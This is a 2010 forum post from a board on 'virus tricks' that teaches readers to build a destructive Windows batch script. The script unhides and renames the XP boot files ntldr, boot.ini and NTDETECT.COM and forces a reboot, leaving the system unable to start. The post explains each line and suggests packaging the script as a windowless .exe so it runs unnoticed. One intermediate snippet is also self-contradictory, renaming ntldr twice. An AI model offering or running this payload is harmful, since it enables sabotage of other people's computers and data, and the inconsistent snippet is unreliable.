DIR Return Create A Forum - Home
---------------------------------------------------------
gworld
HTML https://gworld.createaforum.com
---------------------------------------------------------
*****************************************************
DIR Return to: VIRUS TRICKS n CREATION
*****************************************************
#Post#: 617--------------------------------------------------
SIMPLE VIRUS CREATING
By: eba95 Date: August 9, 2010, 11:18 am
---------------------------------------------------------
1. Create a boot disk
containing Boot Files.
2. Open Notepad and Copy the
Following Codes:
@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05
EXIT
3. Save the File with a *.bat
extension
4. Download a bat2exe
software to convert the file
to .exe
5. The Virus Renames
the ntldr file to dxcore69ldr
disabling OSs to load.
6. Test the Virus in a
computer or using Virtual PC
software like VMWare or the
free Virtual Box.
Full Detail Procedure:
To start from the basics,
Operating Systems of the type
like Windows XP require
these three vital boot files to
start:
1. boot.ini
2. ntldr
3. NTDETECT.COM
Mentioned files are usually
located at the C: Drive and if
these are missing or
renamed, the dependent
Operating Systems won ’t be
able to boot or start.
So by taking this as an
advantage the main target of
the virus is to rename one of
the file so that the Operating
Systems (Usually the mostly
used Windows XP) won ’t be
able to boot.
But safety is always first, thus
we will create a Floppy boot
disk to get rescued from the
virus infection. And this
instruction is found all over
the Information
Superhighway and all the IT
Magazines had at least once
published the Rescue Disk
instructions in an article.
Anyways, the steps are:
1. Go to Control Panel and
then open Folder Options
2. Click on the View tab
3. Click on “Show Hidden Files
and Folders”, uncheck the
“Hide Extensions for known
file types” and “Hide
protected operating system
files ” and then click “OK” and
“Yes”.
4. Now format a Floppy Disk
even if it ’s empty and don’t
attempt to copy anything
now.
5. Now copy the three visible
boot files (boot.ini,
NTDETECT.COM and ntldr) from
the C drive directly to the
Floppy Disk.
Now, if you select the Floppy
Drive to boot first in bios
while the Rescue Floppy disk
is inserted, your operating
system will boot even though
the boot files in C: drive are
missing.
Let’s make the virus now by
renaming only the ntldr file.
Go to
Start>Programs>Accessories>Notepad
or Start>Run>notepad.exe and
copy and paste the following
lines:
@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05
EXIT
Now go to File>Save and Type
“ dxcore69.bat” and the file
will be saved with a .bat
extension.
You can now Double Click on
the dxcore69.bat file you have
created and the ntldr file
should be renamed to
dxcore69ldr disabling the OSs
to boot and a reboot will
occur after five seconds. And
the work of the virus is
completed.
In addition you may want to
create an uneditable virus
looking file by converting
the .bat file to a
noticeable .exe file. Well, the
bat2exe software of the
Package given at the end is
just excellent for doing that.
Browse and select the
dxcore69.bat, select an icon if
you want and check the Ghost
Application option as it will
show no window after lunch.
Now let’s learn what is going
on:
Line # 1: @echo off
Not that necessary if
converted to exe with Ghost
Application option but its
work is not to show any lines
in the black window.
Line # 2: ATTRIB -h -r -s c:
\ntldr
The ntldr file is a Read Only,
Hidden and a System File. This
command in just to disable
this attributes. -h makes a file
hidden but +h will turn it into
a hidden file. And similarly “r”
is for Read Only and “s” is for
System file Attribute. Its
necessary to do the renaming
thingy.
Line # 3: REN c:\ntldr
dxcore69ldr
REN stands for RENAME, in this
command ntldr file of C: Drive
gets renamed to dxcore69ldr
Line # 4: shutdown.exe -r -f -
t 05
This Command Restarts the
computer with a timeout of 5
seconds and forces all the
applications to close. Now the
supporting commands are:
-r = Restart
-f = Forces Applications to
close
-t = Timeout
05 = Timeout Value XX
Line 5: EXIT
It just exits the program
Now that you have learnt
some basics you can also
rename the renaming two
files and to do that type these
lines between the @echo and
the Shutdown line:
ATTRIB -h -r -s c:\boot.ini
REN c:\ntldr dxcore69.ini
ATTRIB -h -r -s c:
\NTDETECT.COM
REN c:\ntldr dxcore69.com
So the new overall virus is:
@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
ATTRIB -h -r -s c:\boot.ini
REN c:\boot.ini dxcore69.ini
ATTRIB -h -r -s c:
\NTDETECT.COM
REN c:\NTDETECT.COM
dxcore69.com
shutdown.exe -r -f -t 05
EXIT
It is natural for us to feel the
fear of not to test a virus in
your PC, but no problem, you
can try it on a Virtual OS
software like VMWare or the
free Virtualbox. It ’s a kind of
software for example gives
you the ability to install and
run Windows Vista in a
Window of Windows XP in a
virtual Hardisk..
*****************************************************